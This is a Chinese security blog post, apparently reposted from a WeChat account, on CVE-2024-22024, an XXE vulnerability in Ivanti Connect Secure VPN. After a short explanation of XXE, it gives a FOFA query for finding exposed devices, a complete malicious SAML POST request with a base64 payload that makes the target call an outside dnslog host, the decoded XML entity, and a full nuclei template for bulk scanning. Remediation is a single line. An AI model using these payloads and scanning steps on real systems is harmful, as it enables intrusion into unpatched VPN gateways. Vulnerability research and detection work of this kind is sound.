CVE-2024-22024

admin 2024年2月27日10:02:36评论82 views字数 2736阅读9分7秒阅读模式

使

该漏洞EXP已公开传播,漏洞利用成本极低,建议您立即关注并修复。

01

漏洞名称

Ivanti Pulse Connect Secure VPN XXE 漏洞

先介绍下什么是XXE漏洞:

XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。

  XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XXE漏洞的基础上,发展出了Blind XXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVG header)应用比较广泛,此外,网上有一些在线XML格式化工具也存在过问题。

02

漏洞影响

Ivanti Pulse Connect Secure VPN

CVE-2024-22024

03

漏洞描述

2024年2月13日互联网上披露 CVE-2024-22024 Ivanti Pulse Connect Secure VPN XXE 漏洞,攻击者可构造恶意请求触发XXE,结合相关功能造成远程代码执行。

04

FOFA搜索语句

body="welcome.cgi?p=logo"

CVE-2024-22024

05

漏洞复现

该漏洞需要借助dnslog来复现,首先注册一个dnslog平台的账号,用于回显,如http://dnslog.pw/dns/?&monitor=true,注册好之后向靶场发送如下数据包,让靶场解析xml数据然后访问dns

POST /dana-na/auth/saml-sso.cgi HTTP/1.1Host: 192.168.40.130:111User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeContent-Length: 204Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

其中SAMLRequest的值是xml文件内容的base64值,xml文件如下

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM    "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

在DNSlog平台能看到一条访问记录

CVE-2024-22024

漏洞复现成功

06

批量扫描poc

nuclei poc文件内容如下

id: CVE-2024-22024

info:  name: Ivanti Connect Secure - XXE  author: watchTowr  severity: high  description: |    Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.  impact: |    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.  remediation: |    Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.  reference:    - https://labs.watchtowr.com/are-we-now-part-of-ivanti/    - https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1  metadata:    max-request: 1    vendor: ivanti    product: "connect_secure"    shodan-query: "html:"welcome.cgi?p=logo""  tags: cve,cve2024,kev,xxe,ivanti

variables:  payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM    "http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'

http:  - raw:      - |        POST /dana-na/auth/saml-sso.cgi HTTP/1.1        Host: {{Hostname}}        Content-Type: application/x-www-form-urlencoded

        SAMLRequest={{base64(payload)}}

    matchers-condition: and    matchers:      - type: word        part: interactsh_protocol  # Confirms the DNS Interaction        words:          - "dns"

      - type: word        part: body        words:          - '/dana-na/'          - 'WriteCSS'        condition: and# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-22024

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月27日10:02:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-22024https://cn-sec.com/archives/2528612.html

发表评论

匿名网友 填写信息